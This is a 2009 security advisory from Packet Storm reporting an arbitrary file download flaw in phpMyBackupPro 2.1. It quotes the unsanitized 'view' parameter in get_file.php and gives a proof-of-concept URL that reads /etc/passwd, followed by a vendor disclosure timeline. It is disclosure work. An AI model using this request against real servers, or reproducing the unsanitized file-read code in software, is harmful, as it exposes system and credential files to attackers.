phpMyBackupPro 2.1 File Download

2009-11-18T00:00:00
ID PACKETSTORM:82748
Type packetstorm
Reporter Amol Naik
Modified 2009-11-18T00:00:00

Description

                                        
                                            `   
################################################################################  
Arbitrary File Download in phpMyBackupPro  
  
Name Arbitrary File Download in phpMyBackupPro  
Systems Affected phpMyBackupPro v 2.1 and possibly earlier versions  
site http://www.phpmybackuppro.net  
Author Amol Naik (amolnaik4[at]gmail.com)  
Date 16/11/2009  
################################################################################  
  
  
############  
1. OVERVIEW  
############  
  
phpMyBackupPro is a web-based MySQL backup application in PHP.   
You can schedule backups, download, email or upload them with FTP and backup whole file directories.   
Zip and gzip compression, easy interface and installation. Many languages and online help!  
  
###############  
2. DESCRIPTION  
###############  
  
phpMyBackupPro is vulnerable to Arbitrary File Download.  
  
######################  
3. TECHNICAL DETAILS  
######################  
  
Arbritrary File Downlaod  
++++++++++++++++++++++++  
  
Vulnerable page get_file.php  
Vulnerable Parameters view  
Vulnerable Code   
  
---------------------------------------------------------------------------------------  
  
// show the requested file  
if (isset($_GET['view']) && file_exists($_GET['view'])) {  
if (isset($_GET['download'])) {  
header("Content-Type: application/octet-stream");  
header("Content-Disposition: attachment; filename=".basename($_GET['view']));  
readfile($_GET['view']);  
} else {  
......  
......  
.......  
}  
  
---------------------------------------------------------------------------------------  
  
The parameter "view" is not properly sanitized which results in Arbitrary file download.  
  
++++  
POC  
++++  
  
http://localhost/phpMyBackupPro/get_file.php?download=true&view=/etc/passwd  
  
  
  
############  
4. TimeLine  
############  
  
20th Oct 2009 Bug Discovered  
20th Oct 2009 Reported to Vendor  
27th Oct 2009 vendor agreed to the vulnerablity and ready to fix it.  
16th Nov 2009 No communication received about the status of the fix.  
16th Nov 2009 Public Disclosure`